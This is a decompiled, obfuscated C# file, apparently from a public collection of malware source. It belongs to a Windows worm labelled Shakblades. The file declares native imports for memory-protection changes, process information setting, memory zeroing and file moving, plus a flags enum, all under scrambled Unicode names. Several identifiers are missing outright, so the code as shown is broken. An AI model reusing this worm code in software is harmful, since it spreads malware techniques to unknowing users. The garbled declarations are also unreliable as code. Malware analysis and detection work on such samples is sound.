MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/٧Ѹ.cs

45 lines
1.7 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.٧Ѹ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using System;
using System.Runtime.InteropServices;
namespace Ҧ߲ʽ
{
internal class \u0667Ѹ
{
[DllImport("kernel32.dll", EntryPoint = "MoveFileEx", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool \u1936\u0A50Ȁ\u0A84ᠬ\u1AE7(string , string , \u0667Ѹ.̯ й);
[DllImport("kernel32.dll", EntryPoint = "VirtualProtect", SetLastError = true)]
public static extern bool \u171F\u1B67ΨƱࠏ(
IntPtr _param0,
uint _param1,
uint _param2,
out uint ҙ);
[DllImport("Kernel32.dll", EntryPoint = "RtlZeroMemory")]
public static extern void \u0CC4\u1C9B\u1BFD(IntPtr _param0, IntPtr ԥ);
[DllImport("ntdll.dll", EntryPoint = "NtSetInformationProcess", SetLastError = true)]
public static extern int (IntPtr _param0, int _param1, ref int _param2, int ݯ);
[DllImport("kernel32.dll", EntryPoint = "GetModuleHandle", CharSet = CharSet.Auto)]
public static extern IntPtr \u1395้ỿ(string ǝ);
[Flags]
public enum ̯
{
ʻѝ = 1,
\u0DD6\u0B70ʮ = 2,
\u17FCנᒞ͍ሴǒ = 4,
Բ\u19FA\u1B69 = 8,
\u192Eψᜤ\u0DB2ᴿ\u0099 = 16, // 0x00000010
ŹҒ\u0EFBᨬᆵᮖ = 32, // 0x00000020
}
}
}